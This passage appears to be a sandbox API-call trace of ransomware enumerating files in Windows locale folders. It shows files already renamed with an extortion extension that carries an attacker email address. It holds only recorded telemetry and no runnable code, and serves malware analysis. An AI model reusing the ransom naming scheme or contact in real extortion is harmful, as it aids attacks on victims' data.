ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ab09f52, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b02bdea, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1184, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.809] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ad6c5da, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ad6c5da, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ae04fd5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x152a6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.810] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8bf9ef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8bf9ef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b9d5b1f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.810] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8bf9ef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8bf9ef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b9d5b1f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.810] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0283.811] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.811] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b06769e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1040", cAlternateFileName="")) returned 1 [0283.811] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.812] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b06769e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948028 [0283.815] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b06769e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.815] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ad6c5da, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ad6c5da, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5adb8b53, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf24, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.815] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ade644c, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ade644c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b0414c0, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x139b6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.815] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e98c2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8e98c2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba2fb18, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.815] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e98c2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8e98c2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba2fb18, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.815] FindClose (in: hFindFile=0x3948028 | out: hFindFile=0x3948028) returned 1 [0283.817] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.817] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b0b3ac1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b0b3ac1, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1041", cAlternateFileName="")) returned 1 [0283.817] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.817] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b0b3ac1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b0b3ac1, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947f68 [0283.821] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b0b3ac1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b0b3ac1, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.821] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ae04fd5, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ae04fd5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b06769e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2874, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.821] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b06769e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b08d838, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x10b86, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.821] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b90bdb3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b90bdb3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba2fb18, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3e58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.821] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b90bdb3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b90bdb3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba2fb18, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3e58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.821] FindClose (in: hFindFile=0x3947f68 | out: hFindFile=0x3947f68) returned 1 [0283.823] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.823] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b420fb4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1042", cAlternateFileName="")) returned 1 [0283.823] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.823] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b420fb4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947f28 [0283.825] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b420fb4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.826] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b06769e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b3d4cb8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3274, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.826] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b3624c8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b3624c8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b420fb4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xffd6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.826] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b90bdb3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b90bdb3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba0974a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.826] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b90bdb3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b90bdb3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba0974a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.826] FindClose (in: hFindFile=0x3947f28 | out: hFindFile=0x3947f28) returned 1 [0283.827] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.827] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b50939c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b50939c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1043", cAlternateFileName="")) returned 1 [0283.827] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.827] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b50939c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b50939c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948328 [0283.830] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b50939c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b50939c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.830] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b0b3ac1, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b0b3ac1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b3624c8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.830] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b3624c8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b3624c8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b4dfc14, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13816, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.830] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba81119, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba81119, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bde93fa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.830] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba81119, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba81119, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bde93fa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.830] FindClose (in: hFindFile=0x3948328 | out: hFindFile=0x3948328) returned 1 [0283.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.831] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b578531, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b578531, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1044", cAlternateFileName="")) returned 1 [0283.831] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.831] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b578531, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b578531, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0283.963] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b578531, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b578531, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.963] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b3fc3a2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b3fc3a2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b55240a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xcd4, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.963] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b55240a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b55240a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b578531, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x136c6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.963] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba0974a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba0974a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bac8a6e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.963] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba0974a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba0974a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bac8a6e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.963] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0283.965] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.965] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1045", cAlternateFileName="")) returned 1 [0283.965] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.965] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0283.969] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, 